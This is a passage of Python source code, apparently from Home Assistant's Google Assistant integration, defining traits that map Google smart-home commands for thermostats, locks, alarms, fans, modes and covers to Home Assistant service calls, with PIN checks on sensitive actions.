                await self.hass.services.async_call(
                    self.state.domain,
                    vacuum.SERVICE_STOP,
                    {ATTR_ENTITY_ID: self.state.entity_id},
                    blocking=True,
                    context=data.context,
                )
        elif command == COMMAND_PAUSEUNPAUSE:
            if params["pause"]:
                await self.hass.services.async_call(
                    self.state.domain,
                    vacuum.SERVICE_PAUSE,
                    {ATTR_ENTITY_ID: self.state.entity_id},
                    blocking=True,
                    context=data.context,
                )
            else:
                # Unpausing resumes via the start service.
                await self.hass.services.async_call(
                    self.state.domain,
                    vacuum.SERVICE_START,
                    {ATTR_ENTITY_ID: self.state.entity_id},
                    blocking=True,
                    context=data.context,
                )
    async def _execute_cover(self, command, data, params, challenge):
        """Execute a StartStop command."""
        # Covers only support "stop": halt the cover while it is moving.
        # "start" and pause/unpause are rejected with SmartHomeError.
        if command == COMMAND_STARTSTOP:
            if params["start"] is False:
                # Assumed-state covers can't report motion, so allow stop.
                if (
                    self.state.state
                    in (
                        cover.STATE_CLOSING,
                        cover.STATE_OPENING,
                    )
                    or self.state.attributes.get(ATTR_ASSUMED_STATE)
                ):
                    await self.hass.services.async_call(
                        self.state.domain,
                        cover.SERVICE_STOP_COVER,
                        {ATTR_ENTITY_ID: self.state.entity_id},
                        blocking=True,
                        context=data.context,
                    )
                else:
                    raise SmartHomeError(
                        ERR_ALREADY_STOPPED, "Cover is already stopped"
                    )
            else:
                raise SmartHomeError(
                    ERR_NOT_SUPPORTED, "Starting a cover is not supported"
                )
        else:
            raise SmartHomeError(
                ERR_NOT_SUPPORTED, f"Command {command} is not supported"
            )
@register_trait
class TemperatureControlTrait(_Trait):
    """Trait for devices (other than thermostats) that support controlling temperature. Workaround for Temperature sensors.
    https://developers.google.com/assistant/smarthome/traits/temperaturecontrol
    """

    name = TRAIT_TEMPERATURE_CONTROL

    @staticmethod
    def supported(domain, features, device_class, _):
        """Test if state is supported."""
        if domain != sensor.DOMAIN:
            return False
        return device_class == sensor.DEVICE_CLASS_TEMPERATURE

    def sync_attributes(self):
        """Return temperature attributes for a sync request."""
        return {
            "temperatureUnitForUX": _google_temp_unit(
                self.hass.config.units.temperature_unit
            ),
            # Sensors are read-only; the range below is only nominal.
            "queryOnlyTemperatureSetting": True,
            "temperatureRange": {
                "minThresholdCelsius": -100,
                "maxThresholdCelsius": 100,
            },
        }

    def query_attributes(self):
        """Return temperature states."""
        raw_state = self.state.state
        if raw_state in (STATE_UNKNOWN, STATE_UNAVAILABLE):
            return {}
        unit = self.hass.config.units.temperature_unit
        # Google always expects Celsius, rounded to one decimal.
        celsius = round(temp_util.convert(float(raw_state), unit, TEMP_CELSIUS), 1)
        return {
            "temperatureSetpointCelsius": celsius,
            "temperatureAmbientCelsius": celsius,
        }

    async def execute(self, command, data, params, challenge):
        """Unsupported."""
        raise SmartHomeError(ERR_NOT_SUPPORTED, "Execute is not supported by sensor")
@register_trait
class TemperatureSettingTrait(_Trait):
    """Trait to offer handling both temperature point and modes functionality.

    https://developers.google.com/actions/smarthome/traits/temperaturesetting
    """

    name = TRAIT_TEMPERATURE_SETTING
    commands = [
        COMMAND_THERMOSTAT_TEMPERATURE_SETPOINT,
        COMMAND_THERMOSTAT_TEMPERATURE_SET_RANGE,
        COMMAND_THERMOSTAT_SET_MODE,
    ]
    # We do not support "on" as we are unable to know how to restore
    # the last mode.
    hvac_to_google = {
        climate.HVAC_MODE_HEAT: "heat",
        climate.HVAC_MODE_COOL: "cool",
        climate.HVAC_MODE_OFF: "off",
        climate.HVAC_MODE_AUTO: "auto",
        climate.HVAC_MODE_HEAT_COOL: "heatcool",
        climate.HVAC_MODE_FAN_ONLY: "fan-only",
        climate.HVAC_MODE_DRY: "dry",
    }
    google_to_hvac = {value: key for key, value in hvac_to_google.items()}
    # Presets exposed as extra Google modes alongside HVAC modes.
    preset_to_google = {climate.PRESET_ECO: "eco"}
    google_to_preset = {value: key for key, value in preset_to_google.items()}

    @staticmethod
    def supported(domain, features, device_class, _):
        """Test if state is supported."""
        return domain == climate.DOMAIN

    @property
    def climate_google_modes(self):
        """Return supported Google modes."""
        modes = []
        attrs = self.state.attributes
        # HVAC modes first, then presets; skip unmapped ones and duplicates.
        for mode in attrs.get(climate.ATTR_HVAC_MODES, []):
            google_mode = self.hvac_to_google.get(mode)
            if google_mode and google_mode not in modes:
                modes.append(google_mode)
        for preset in attrs.get(climate.ATTR_PRESET_MODES, []):
            google_mode = self.preset_to_google.get(preset)
            if google_mode and google_mode not in modes:
                modes.append(google_mode)
        return modes

    def sync_attributes(self):
        """Return temperature point and modes attributes for a sync request."""
        response = {}
        response["thermostatTemperatureUnit"] = _google_temp_unit(
            self.hass.config.units.temperature_unit
        )
        modes = self.climate_google_modes
        # Some integrations don't support modes (e.g. opentherm), but Google doesn't
        # support changing the temperature if we don't have any modes. If there's
        # only one Google doesn't support changing it, so the default mode here is
        # only cosmetic.
        if len(modes) == 0:
            modes.append("heat")
        if "off" in modes and any(
            mode in modes for mode in ("heatcool", "heat", "cool")
        ):
            modes.append("on")
        response["availableThermostatModes"] = modes
        return response

    def query_attributes(self):
        """Return temperature point and modes query attributes."""
        response = {}
        attrs = self.state.attributes
        unit = self.hass.config.units.temperature_unit
        operation = self.state.state
        preset = attrs.get(climate.ATTR_PRESET_MODE)
        supported = attrs.get(ATTR_SUPPORTED_FEATURES, 0)
        # An active, mapped preset (e.g. eco) takes precedence over HVAC mode.
        if preset in self.preset_to_google:
            response["thermostatMode"] = self.preset_to_google[preset]
        else:
            response["thermostatMode"] = self.hvac_to_google.get(operation, "none")
        current_temp = attrs.get(climate.ATTR_CURRENT_TEMPERATURE)
        if current_temp is not None:
            # Google always expects Celsius, rounded to one decimal.
            response["thermostatTemperatureAmbient"] = round(
                temp_util.convert(current_temp, unit, TEMP_CELSIUS), 1
            )
        current_humidity = attrs.get(climate.ATTR_CURRENT_HUMIDITY)
        if current_humidity is not None:
            response["thermostatHumidityAmbient"] = current_humidity
        if operation in (climate.HVAC_MODE_AUTO, climate.HVAC_MODE_HEAT_COOL):
            if supported & climate.SUPPORT_TARGET_TEMPERATURE_RANGE:
                response["thermostatTemperatureSetpointHigh"] = round(
                    temp_util.convert(
                        attrs[climate.ATTR_TARGET_TEMP_HIGH], unit, TEMP_CELSIUS
                    ),
                    1,
                )
                response["thermostatTemperatureSetpointLow"] = round(
                    temp_util.convert(
                        attrs[climate.ATTR_TARGET_TEMP_LOW], unit, TEMP_CELSIUS
                    ),
                    1,
                )
            else:
                # No range support: report the single target as both bounds.
                if (target_temp := attrs.get(ATTR_TEMPERATURE)) is not None:
                    target_temp = round(
                        temp_util.convert(target_temp, unit, TEMP_CELSIUS), 1
                    )
                    response["thermostatTemperatureSetpointHigh"] = target_temp
                    response["thermostatTemperatureSetpointLow"] = target_temp
        else:
            if (target_temp := attrs.get(ATTR_TEMPERATURE)) is not None:
                response["thermostatTemperatureSetpoint"] = round(
                    temp_util.convert(target_temp, unit, TEMP_CELSIUS), 1
                )
        return response

    async def execute(self, command, data, params, challenge):
        """Execute a temperature point or mode command."""
        # All sent in temperatures are always in Celsius
        unit = self.hass.config.units.temperature_unit
        min_temp = self.state.attributes[climate.ATTR_MIN_TEMP]
        max_temp = self.state.attributes[climate.ATTR_MAX_TEMP]
        if command == COMMAND_THERMOSTAT_TEMPERATURE_SETPOINT:
            temp = temp_util.convert(
                params["thermostatTemperatureSetpoint"], TEMP_CELSIUS, unit
            )
            if unit == TEMP_FAHRENHEIT:
                temp = round(temp)
            if temp < min_temp or temp > max_temp:
                raise SmartHomeError(
                    ERR_VALUE_OUT_OF_RANGE,
                    f"Temperature should be between {min_temp} and {max_temp}",
                )
            await self.hass.services.async_call(
                climate.DOMAIN,
                climate.SERVICE_SET_TEMPERATURE,
                {ATTR_ENTITY_ID: self.state.entity_id, ATTR_TEMPERATURE: temp},
                blocking=True,
                context=data.context,
            )
        elif command == COMMAND_THERMOSTAT_TEMPERATURE_SET_RANGE:
            temp_high = temp_util.convert(
                params["thermostatTemperatureSetpointHigh"], TEMP_CELSIUS, unit
            )
            if unit == TEMP_FAHRENHEIT:
                temp_high = round(temp_high)
            if temp_high < min_temp or temp_high > max_temp:
                raise SmartHomeError(
                    ERR_VALUE_OUT_OF_RANGE,
                    (
                        f"Upper bound for temperature range should be between "
                        f"{min_temp} and {max_temp}"
                    ),
                )
            temp_low = temp_util.convert(
                params["thermostatTemperatureSetpointLow"], TEMP_CELSIUS, unit
            )
            if unit == TEMP_FAHRENHEIT:
                temp_low = round(temp_low)
            if temp_low < min_temp or temp_low > max_temp:
                raise SmartHomeError(
                    ERR_VALUE_OUT_OF_RANGE,
                    (
                        f"Lower bound for temperature range should be between "
                        f"{min_temp} and {max_temp}"
                    ),
                )
            # Default to 0 so a missing supported-features attribute doesn't
            # raise TypeError on the bitwise test (matches query_attributes).
            supported = self.state.attributes.get(ATTR_SUPPORTED_FEATURES, 0)
            svc_data = {ATTR_ENTITY_ID: self.state.entity_id}
            if supported & climate.SUPPORT_TARGET_TEMPERATURE_RANGE:
                svc_data[climate.ATTR_TARGET_TEMP_HIGH] = temp_high
                svc_data[climate.ATTR_TARGET_TEMP_LOW] = temp_low
            else:
                # No range support: aim for the midpoint of the range.
                svc_data[ATTR_TEMPERATURE] = (temp_high + temp_low) / 2
            await self.hass.services.async_call(
                climate.DOMAIN,
                climate.SERVICE_SET_TEMPERATURE,
                svc_data,
                blocking=True,
                context=data.context,
            )
        elif command == COMMAND_THERMOSTAT_SET_MODE:
            target_mode = params["thermostatMode"]
            if target_mode == "on":
                await self.hass.services.async_call(
                    climate.DOMAIN,
                    SERVICE_TURN_ON,
                    {ATTR_ENTITY_ID: self.state.entity_id},
                    blocking=True,
                    context=data.context,
                )
                return
            if target_mode == "off":
                await self.hass.services.async_call(
                    climate.DOMAIN,
                    SERVICE_TURN_OFF,
                    {ATTR_ENTITY_ID: self.state.entity_id},
                    blocking=True,
                    context=data.context,
                )
                return
            if target_mode in self.google_to_preset:
                await self.hass.services.async_call(
                    climate.DOMAIN,
                    climate.SERVICE_SET_PRESET_MODE,
                    {
                        climate.ATTR_PRESET_MODE: self.google_to_preset[target_mode],
                        ATTR_ENTITY_ID: self.state.entity_id,
                    },
                    blocking=True,
                    context=data.context,
                )
                return
            # NOTE(review): an unmapped target_mode raises KeyError here
            # rather than SmartHomeError — preserved as-is.
            await self.hass.services.async_call(
                climate.DOMAIN,
                climate.SERVICE_SET_HVAC_MODE,
                {
                    ATTR_ENTITY_ID: self.state.entity_id,
                    climate.ATTR_HVAC_MODE: self.google_to_hvac[target_mode],
                },
                blocking=True,
                context=data.context,
            )
@register_trait
class HumiditySettingTrait(_Trait):
    """Trait handling humidity readings and setpoints.

    https://developers.google.com/actions/smarthome/traits/humiditysetting
    """

    name = TRAIT_HUMIDITY_SETTING
    commands = [COMMAND_SET_HUMIDITY]

    @staticmethod
    def supported(domain, features, device_class, _):
        """Test if state is supported."""
        if domain == humidifier.DOMAIN:
            return True
        return domain == sensor.DOMAIN and device_class == sensor.DEVICE_CLASS_HUMIDITY

    def sync_attributes(self):
        """Return humidity attributes for a sync request."""
        domain = self.state.domain
        attrs = self.state.attributes
        if domain == sensor.DOMAIN:
            # Humidity sensors are read-only.
            if attrs.get(ATTR_DEVICE_CLASS) == sensor.DEVICE_CLASS_HUMIDITY:
                return {"queryOnlyHumiditySetting": True}
            return {}
        if domain == humidifier.DOMAIN:
            return {
                "humiditySetpointRange": {
                    "minPercent": round(float(attrs[humidifier.ATTR_MIN_HUMIDITY])),
                    "maxPercent": round(float(attrs[humidifier.ATTR_MAX_HUMIDITY])),
                }
            }
        return {}

    def query_attributes(self):
        """Return humidity query attributes."""
        domain = self.state.domain
        attrs = self.state.attributes
        if domain == sensor.DOMAIN:
            if attrs.get(ATTR_DEVICE_CLASS) == sensor.DEVICE_CLASS_HUMIDITY:
                reading = self.state.state
                if reading not in (STATE_UNKNOWN, STATE_UNAVAILABLE):
                    return {"humidityAmbientPercent": round(float(reading))}
            return {}
        if domain == humidifier.DOMAIN:
            target = attrs.get(humidifier.ATTR_HUMIDITY)
            if target is not None:
                return {"humiditySetpointPercent": round(float(target))}
        return {}

    async def execute(self, command, data, params, challenge):
        """Execute a humidity command."""
        if self.state.domain == sensor.DOMAIN:
            raise SmartHomeError(
                ERR_NOT_SUPPORTED, "Execute is not supported by sensor"
            )
        if command == COMMAND_SET_HUMIDITY:
            await self.hass.services.async_call(
                humidifier.DOMAIN,
                humidifier.SERVICE_SET_HUMIDITY,
                {
                    ATTR_ENTITY_ID: self.state.entity_id,
                    humidifier.ATTR_HUMIDITY: params["humidity"],
                },
                blocking=True,
                context=data.context,
            )
@register_trait
class LockUnlockTrait(_Trait):
    """Trait locking and unlocking a lock entity.

    https://developers.google.com/actions/smarthome/traits/lockunlock
    """

    name = TRAIT_LOCKUNLOCK
    commands = [COMMAND_LOCKUNLOCK]

    @staticmethod
    def supported(domain, features, device_class, _):
        """Test if state is supported."""
        return domain == lock.DOMAIN

    @staticmethod
    def might_2fa(domain, features, device_class):
        """Return if the trait might ask for 2FA."""
        # Unlocking is security sensitive, so a challenge may be required.
        return True

    def sync_attributes(self):
        """Return LockUnlock attributes for a sync request."""
        return {}

    def query_attributes(self):
        """Return LockUnlock query attributes."""
        current = self.state.state
        if current == STATE_JAMMED:
            return {"isJammed": True}
        # A lock that is still unlocking is reported as locked until done.
        return {"isLocked": current in (STATE_UNLOCKING, STATE_LOCKED)}

    async def execute(self, command, data, params, challenge):
        """Execute an LockUnlock command."""
        if params["lock"]:
            service = lock.SERVICE_LOCK
        else:
            # Unlocking requires passing the configured PIN challenge first.
            _verify_pin_challenge(data, self.state, challenge)
            service = lock.SERVICE_UNLOCK
        await self.hass.services.async_call(
            lock.DOMAIN,
            service,
            {ATTR_ENTITY_ID: self.state.entity_id},
            blocking=True,
            context=data.context,
        )
@register_trait
class ArmDisArmTrait(_Trait):
    """Trait to Arm or Disarm a Security System.

    https://developers.google.com/actions/smarthome/traits/armdisarm
    """

    name = TRAIT_ARMDISARM
    commands = [COMMAND_ARMDISARM]

    # Alarm state -> alarm_control_panel service that reaches that state.
    state_to_service = {
        STATE_ALARM_ARMED_HOME: SERVICE_ALARM_ARM_HOME,
        STATE_ALARM_ARMED_AWAY: SERVICE_ALARM_ARM_AWAY,
        STATE_ALARM_ARMED_NIGHT: SERVICE_ALARM_ARM_NIGHT,
        STATE_ALARM_ARMED_CUSTOM_BYPASS: SERVICE_ALARM_ARM_CUSTOM_BYPASS,
        STATE_ALARM_TRIGGERED: SERVICE_ALARM_TRIGGER,
    }

    # Alarm state -> feature bit the panel must report for that state to be
    # advertised as an available arm level.
    state_to_support = {
        STATE_ALARM_ARMED_HOME: alarm_control_panel.const.SUPPORT_ALARM_ARM_HOME,
        STATE_ALARM_ARMED_AWAY: alarm_control_panel.const.SUPPORT_ALARM_ARM_AWAY,
        STATE_ALARM_ARMED_NIGHT: alarm_control_panel.const.SUPPORT_ALARM_ARM_NIGHT,
        STATE_ALARM_ARMED_CUSTOM_BYPASS: alarm_control_panel.const.SUPPORT_ALARM_ARM_CUSTOM_BYPASS,
        STATE_ALARM_TRIGGERED: alarm_control_panel.const.SUPPORT_ALARM_TRIGGER,
    }

    @staticmethod
    def supported(domain, features, device_class, _):
        """Test if state is supported."""
        return domain == alarm_control_panel.DOMAIN

    @staticmethod
    def might_2fa(domain, features, device_class):
        """Return if the trait might ask for 2FA."""
        return True

    def _supported_states(self):
        """Return the alarm states allowed by the panel's feature flags."""
        features = self.state.attributes.get(ATTR_SUPPORTED_FEATURES, 0)
        return [
            state
            for state, required_feature in self.state_to_support.items()
            if features & required_feature != 0
        ]

    def sync_attributes(self):
        """Return ArmDisarm attributes for a sync request."""
        response = {}
        levels = []
        for state in self._supported_states():
            # level synonyms are generated from state names
            # 'armed_away' becomes 'armed away' or 'away'
            level_synonym = [state.replace("_", " ")]
            if state != STATE_ALARM_TRIGGERED:
                level_synonym.append(state.split("_")[1])
            level = {
                "level_name": state,
                "level_values": [{"level_synonym": level_synonym, "lang": "en"}],
            }
            levels.append(level)
        response["availableArmLevels"] = {"levels": levels, "ordered": False}
        return response

    def query_attributes(self):
        """Return ArmDisarm query attributes."""
        # "next_state" (when present) is the pending target state; report it
        # so Google sees where the panel is transitioning to.
        if "next_state" in self.state.attributes:
            armed_state = self.state.attributes["next_state"]
        else:
            armed_state = self.state.state
        response = {"isArmed": armed_state in self.state_to_service}
        if response["isArmed"]:
            response.update({"currentArmLevel": armed_state})
        return response

    async def execute(self, command, data, params, challenge):
        """Execute an ArmDisarm command."""
        if params["arm"] and not params.get("cancel"):
            # If no arm level given, we can only arm it if there is
            # only one supported arm type. We never default to triggered.
            if not (arm_level := params.get("armLevel")):
                states = self._supported_states()
                if STATE_ALARM_TRIGGERED in states:
                    states.remove(STATE_ALARM_TRIGGERED)
                if len(states) != 1:
                    raise SmartHomeError(ERR_NOT_SUPPORTED, "ArmLevel missing")
                arm_level = states[0]
            if self.state.state == arm_level:
                raise SmartHomeError(ERR_ALREADY_ARMED, "System is already armed")
            # Arming only needs the PIN when the panel itself requires a code.
            if self.state.attributes["code_arm_required"]:
                _verify_pin_challenge(data, self.state, challenge)
            service = self.state_to_service[arm_level]
        # disarm the system without asking for code when
        # 'cancel' arming action is received while current status is pending
        elif (
            params["arm"]
            and params.get("cancel")
            and self.state.state == STATE_ALARM_PENDING
        ):
            service = SERVICE_ALARM_DISARM
        else:
            if self.state.state == STATE_ALARM_DISARMED:
                raise SmartHomeError(ERR_ALREADY_DISARMED, "System is already disarmed")
            # Disarming always requires the PIN challenge.
            _verify_pin_challenge(data, self.state, challenge)
            service = SERVICE_ALARM_DISARM
        await self.hass.services.async_call(
            alarm_control_panel.DOMAIN,
            service,
            {
                ATTR_ENTITY_ID: self.state.entity_id,
                ATTR_CODE: data.config.secure_devices_pin,
            },
            blocking=True,
            context=data.context,
        )
@register_trait
class FanSpeedTrait(_Trait):
    """Trait to control speed of Fan.

    https://developers.google.com/actions/smarthome/traits/fanspeed
    """

    name = TRAIT_FANSPEED
    commands = [COMMAND_FANSPEED, COMMAND_REVERSE]

    @staticmethod
    def supported(domain, features, device_class, _):
        """Test if state is supported."""
        if domain == fan.DOMAIN:
            return features & fan.SUPPORT_SET_SPEED
        if domain == climate.DOMAIN:
            return features & climate.SUPPORT_FAN_MODE
        return False

    def sync_attributes(self):
        """Return speed point and modes attributes for a sync request."""
        domain = self.state.domain
        speeds = []
        result = {}
        if domain == fan.DOMAIN:
            # Fans are exposed as percentage speeds; reversing is offered
            # only when the fan supports direction control.
            reversible = bool(
                self.state.attributes.get(ATTR_SUPPORTED_FEATURES, 0)
                & fan.SUPPORT_DIRECTION
            )
            result.update(
                {
                    "reversible": reversible,
                    "supportsFanSpeedPercent": True,
                }
            )
        elif domain == climate.DOMAIN:
            # Climate devices expose named fan modes instead of percentages.
            modes = self.state.attributes.get(climate.ATTR_FAN_MODES) or []
            for mode in modes:
                speed = {
                    "speed_name": mode,
                    "speed_values": [{"speed_synonym": [mode], "lang": "en"}],
                }
                speeds.append(speed)
            result.update(
                {
                    "reversible": False,
                    "availableFanSpeeds": {"speeds": speeds, "ordered": True},
                }
            )
        return result

    def query_attributes(self):
        """Return speed point and modes query attributes."""
        attrs = self.state.attributes
        domain = self.state.domain
        response = {}
        if domain == climate.DOMAIN:
            speed = attrs.get(climate.ATTR_FAN_MODE) or "off"
            response["currentFanSpeedSetting"] = speed
        if domain == fan.DOMAIN:
            percent = attrs.get(fan.ATTR_PERCENTAGE) or 0
            response["currentFanSpeedPercent"] = percent
        return response

    async def execute_fanspeed(self, data, params):
        """Execute an SetFanSpeed command."""
        domain = self.state.domain
        if domain == climate.DOMAIN:
            # Named mode for climate devices ("fanSpeed" param).
            await self.hass.services.async_call(
                climate.DOMAIN,
                climate.SERVICE_SET_FAN_MODE,
                {
                    ATTR_ENTITY_ID: self.state.entity_id,
                    climate.ATTR_FAN_MODE: params["fanSpeed"],
                },
                blocking=True,
                context=data.context,
            )
        if domain == fan.DOMAIN:
            # Percentage speed for fans ("fanSpeedPercent" param).
            await self.hass.services.async_call(
                fan.DOMAIN,
                fan.SERVICE_SET_PERCENTAGE,
                {
                    ATTR_ENTITY_ID: self.state.entity_id,
                    fan.ATTR_PERCENTAGE: params["fanSpeedPercent"],
                },
                blocking=True,
                context=data.context,
            )

    async def execute_reverse(self, data, params):
        """Execute a Reverse command."""
        domain = self.state.domain
        if domain == fan.DOMAIN:
            # Toggle to the opposite of the current direction.
            if self.state.attributes.get(fan.ATTR_DIRECTION) == fan.DIRECTION_FORWARD:
                direction = fan.DIRECTION_REVERSE
            else:
                direction = fan.DIRECTION_FORWARD
            await self.hass.services.async_call(
                fan.DOMAIN,
                fan.SERVICE_SET_DIRECTION,
                {ATTR_ENTITY_ID: self.state.entity_id, fan.ATTR_DIRECTION: direction},
                blocking=True,
                context=data.context,
            )

    async def execute(self, command, data, params, challenge):
        """Execute a smart home command."""
        if command == COMMAND_FANSPEED:
            await self.execute_fanspeed(data, params)
        elif command == COMMAND_REVERSE:
            await self.execute_reverse(data, params)
@register_trait
class ModesTrait(_Trait):
    """Trait to set modes.

    https://developers.google.com/actions/smarthome/traits/modes
    """

    name = TRAIT_MODES
    commands = [COMMAND_MODES]

    # Alternative phrases Google may use to refer to each mode/setting name.
    SYNONYMS = {
        "preset mode": ["preset mode", "mode", "preset"],
        "sound mode": ["sound mode", "effects"],
        "option": ["option", "setting", "mode", "value"],
    }

    @staticmethod
    def supported(domain, features, device_class, _):
        """Test if state is supported."""
        if domain == fan.DOMAIN and features & fan.SUPPORT_PRESET_MODE:
            return True
        if domain == input_select.DOMAIN:
            return True
        if domain == select.DOMAIN:
            return True
        if domain == humidifier.DOMAIN and features & humidifier.SUPPORT_MODES:
            return True
        if domain == light.DOMAIN and features & light.SUPPORT_EFFECT:
            return True
        if domain != media_player.DOMAIN:
            return False
        return features & media_player.SUPPORT_SELECT_SOUND_MODE

    def _generate(self, name, settings):
        """Generate a mode description with one setting per allowed value."""
        mode = {
            "name": name,
            "name_values": [
                {"name_synonym": self.SYNONYMS.get(name, [name]), "lang": "en"}
            ],
            "settings": [],
            "ordered": False,
        }
        for setting in settings:
            mode["settings"].append(
                {
                    "setting_name": setting,
                    "setting_values": [
                        {
                            "setting_synonym": self.SYNONYMS.get(setting, [setting]),
                            "lang": "en",
                        }
                    ],
                }
            )
        return mode

    def sync_attributes(self):
        """Return mode attributes for a sync request."""
        modes = []
        for domain, attr, name in (
            (fan.DOMAIN, fan.ATTR_PRESET_MODES, "preset mode"),
            (media_player.DOMAIN, media_player.ATTR_SOUND_MODE_LIST, "sound mode"),
            (input_select.DOMAIN, input_select.ATTR_OPTIONS, "option"),
            (select.DOMAIN, select.ATTR_OPTIONS, "option"),
            (humidifier.DOMAIN, humidifier.ATTR_AVAILABLE_MODES, "mode"),
            (light.DOMAIN, light.ATTR_EFFECT_LIST, "effect"),
        ):
            if self.state.domain != domain:
                continue
            if (items := self.state.attributes.get(attr)) is not None:
                modes.append(self._generate(name, items))
            # Shortcut since all domains are currently unique
            break
        payload = {"availableModes": modes}
        return payload

    def query_attributes(self):
        """Return current modes."""
        attrs = self.state.attributes
        response = {}
        mode_settings = {}
        if self.state.domain == fan.DOMAIN:
            if fan.ATTR_PRESET_MODES in attrs:
                mode_settings["preset mode"] = attrs.get(fan.ATTR_PRESET_MODE)
        elif self.state.domain == media_player.DOMAIN:
            if media_player.ATTR_SOUND_MODE_LIST in attrs:
                mode_settings["sound mode"] = attrs.get(media_player.ATTR_SOUND_MODE)
        elif self.state.domain == input_select.DOMAIN:
            mode_settings["option"] = self.state.state
        elif self.state.domain == select.DOMAIN:
            mode_settings["option"] = self.state.state
        elif self.state.domain == humidifier.DOMAIN:
            if ATTR_MODE in attrs:
                mode_settings["mode"] = attrs.get(ATTR_MODE)
        elif self.state.domain == light.DOMAIN and light.ATTR_EFFECT in attrs:
            mode_settings["effect"] = attrs.get(light.ATTR_EFFECT)
        if mode_settings:
            response["on"] = self.state.state not in (STATE_OFF, STATE_UNKNOWN)
            response["currentModeSettings"] = mode_settings
        return response

    async def execute(self, command, data, params, challenge):
        """Execute a SetModes command.

        Dispatches on the entity's domain; logs (without raising) when the
        domain is not handled.
        """
        settings = params.get("updateModeSettings")
        if self.state.domain == fan.DOMAIN:
            preset_mode = settings["preset mode"]
            await self.hass.services.async_call(
                fan.DOMAIN,
                fan.SERVICE_SET_PRESET_MODE,
                {
                    ATTR_ENTITY_ID: self.state.entity_id,
                    fan.ATTR_PRESET_MODE: preset_mode,
                },
                blocking=True,
                context=data.context,
            )
            return
        if self.state.domain == input_select.DOMAIN:
            option = settings["option"]
            await self.hass.services.async_call(
                input_select.DOMAIN,
                input_select.SERVICE_SELECT_OPTION,
                {
                    ATTR_ENTITY_ID: self.state.entity_id,
                    input_select.ATTR_OPTION: option,
                },
                blocking=True,
                context=data.context,
            )
            return
        if self.state.domain == select.DOMAIN:
            option = settings["option"]
            await self.hass.services.async_call(
                select.DOMAIN,
                select.SERVICE_SELECT_OPTION,
                {
                    ATTR_ENTITY_ID: self.state.entity_id,
                    select.ATTR_OPTION: option,
                },
                blocking=True,
                context=data.context,
            )
            return
        if self.state.domain == humidifier.DOMAIN:
            requested_mode = settings["mode"]
            await self.hass.services.async_call(
                humidifier.DOMAIN,
                humidifier.SERVICE_SET_MODE,
                {
                    ATTR_MODE: requested_mode,
                    ATTR_ENTITY_ID: self.state.entity_id,
                },
                blocking=True,
                context=data.context,
            )
            return
        if self.state.domain == light.DOMAIN:
            requested_effect = settings["effect"]
            await self.hass.services.async_call(
                light.DOMAIN,
                SERVICE_TURN_ON,
                {
                    ATTR_ENTITY_ID: self.state.entity_id,
                    light.ATTR_EFFECT: requested_effect,
                },
                blocking=True,
                context=data.context,
            )
            return
        if self.state.domain == media_player.DOMAIN and (
            sound_mode := settings.get("sound mode")
        ):
            await self.hass.services.async_call(
                media_player.DOMAIN,
                media_player.SERVICE_SELECT_SOUND_MODE,
                {
                    ATTR_ENTITY_ID: self.state.entity_id,
                    media_player.ATTR_SOUND_MODE: sound_mode,
                },
                blocking=True,
                context=data.context,
            )
            # Bug fix: return after a successful sound-mode change so the
            # "unrecognised domain" message below is not logged on success.
            return

        _LOGGER.info(
            "Received an Options command for unrecognised domain %s",
            self.state.domain,
        )
        return
@register_trait
class InputSelectorTrait(_Trait):
    """Trait to set modes.

    https://developers.google.com/assistant/smarthome/traits/inputselector
    """

    name = TRAIT_INPUTSELECTOR
    commands = [COMMAND_INPUT, COMMAND_NEXT_INPUT, COMMAND_PREVIOUS_INPUT]

    SYNONYMS = {}

    @staticmethod
    def supported(domain, features, device_class, _):
        """Test if state is supported."""
        return bool(
            domain == media_player.DOMAIN
            and features & media_player.SUPPORT_SELECT_SOURCE
        )

    def sync_attributes(self):
        """Return mode attributes for a sync request."""
        source_list = self.state.attributes.get(
            media_player.ATTR_INPUT_SOURCE_LIST, []
        )
        available = [
            {"key": src, "names": [{"name_synonym": [src], "lang": "en"}]}
            for src in source_list
        ]
        return {"availableInputs": available, "orderedInputs": True}

    def query_attributes(self):
        """Return current modes."""
        return {
            "currentInput": self.state.attributes.get(
                media_player.ATTR_INPUT_SOURCE, ""
            )
        }

    async def execute(self, command, data, params, challenge):
        """Execute an SetInputSource command."""
        attrs = self.state.attributes
        sources = attrs.get(media_player.ATTR_INPUT_SOURCE_LIST) or []
        current = attrs.get(media_player.ATTR_INPUT_SOURCE)

        # Resolve the requested source from the command type.
        if command == COMMAND_INPUT:
            requested = params.get("newInput")
        elif command == COMMAND_NEXT_INPUT:
            requested = _next_selected(sources, current)
        elif command == COMMAND_PREVIOUS_INPUT:
            # "Previous" is "next" over the reversed source list.
            requested = _next_selected(list(reversed(sources)), current)
        else:
            raise SmartHomeError(ERR_NOT_SUPPORTED, "Unsupported command")

        if requested not in sources:
            raise SmartHomeError(ERR_UNSUPPORTED_INPUT, "Unsupported input")

        await self.hass.services.async_call(
            media_player.DOMAIN,
            media_player.SERVICE_SELECT_SOURCE,
            {
                ATTR_ENTITY_ID: self.state.entity_id,
                media_player.ATTR_INPUT_SOURCE: requested,
            },
            blocking=True,
            context=data.context,
        )
@register_trait
class OpenCloseTrait(_Trait):
    """Trait to open and close a cover.

    https://developers.google.com/actions/smarthome/traits/openclose
    """

    # Cover device classes that require 2FA
    COVER_2FA = (
        cover.DEVICE_CLASS_DOOR,
        cover.DEVICE_CLASS_GARAGE,
        cover.DEVICE_CLASS_GATE,
    )

    name = TRAIT_OPENCLOSE
    commands = [COMMAND_OPENCLOSE, COMMAND_OPENCLOSE_RELATIVE]

    @staticmethod
    def supported(domain, features, device_class, _):
        """Test if state is supported."""
        if domain == cover.DOMAIN:
            return True
        # Door/opening-like binary sensors are supported query-only.
        return domain == binary_sensor.DOMAIN and device_class in (
            binary_sensor.DEVICE_CLASS_DOOR,
            binary_sensor.DEVICE_CLASS_GARAGE_DOOR,
            binary_sensor.DEVICE_CLASS_LOCK,
            binary_sensor.DEVICE_CLASS_OPENING,
            binary_sensor.DEVICE_CLASS_WINDOW,
        )

    @staticmethod
    def might_2fa(domain, features, device_class):
        """Return if the trait might ask for 2FA."""
        return domain == cover.DOMAIN and device_class in OpenCloseTrait.COVER_2FA

    def sync_attributes(self):
        """Return opening direction."""
        response = {}
        features = self.state.attributes.get(ATTR_SUPPORTED_FEATURES, 0)
        if self.state.domain == binary_sensor.DOMAIN:
            response["queryOnlyOpenClose"] = True
            response["discreteOnlyOpenClose"] = True
        elif (
            self.state.domain == cover.DOMAIN
            and features & cover.SUPPORT_SET_POSITION == 0
        ):
            # Without position support the cover is only fully open or
            # fully closed.
